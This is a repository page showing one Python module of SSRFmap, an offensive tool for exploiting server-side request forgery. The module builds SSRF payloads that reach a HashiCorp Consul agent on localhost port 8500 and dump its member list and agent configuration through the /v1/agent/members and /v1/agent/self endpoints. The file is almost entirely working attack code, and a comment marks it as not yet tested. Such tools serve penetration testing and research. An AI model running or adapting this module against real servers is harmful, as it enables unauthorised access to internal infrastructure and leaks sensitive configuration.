swisskyrepo
/
SSRFmap
mirror of https://github.com/swisskyrepo/SSRFmap.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
SSRFmap/modules/consul.py

39 lines
1008 B
Python
Raw Blame History

from core.utils import *
import logging
import json
import urllib.parse
# NOTE : NOT TESTED YET
# might need some editing to work properly !
name = "consul"
description = "Hashicorp Consul Info Leak - Open API"
author = "Swissky"
documentation = [
"https://www.consul.io/api/agent.html"
]
class exploit():
def __init__(self, requester, args):
logging.info(f"Module '{name}' launched !")
gen_host = gen_ip_list("127.0.0.1", args.level)
port = "8500"
# List Members
for ip in gen_host:
data = "/v1/agent/members"
payload = wrapper_http(data, ip, port)
r = requester.do_request(args.param, payload)
if r.json:
print(r.json)
# Read Configuration
for ip in gen_host:
data = "/v1/agent/self"
payload = wrapper_http(data, ip, port)
r = requester.do_request(args.param, payload)
if r.json:
print(r.json)
Reference in New Issue View Git Blame Copy Permalink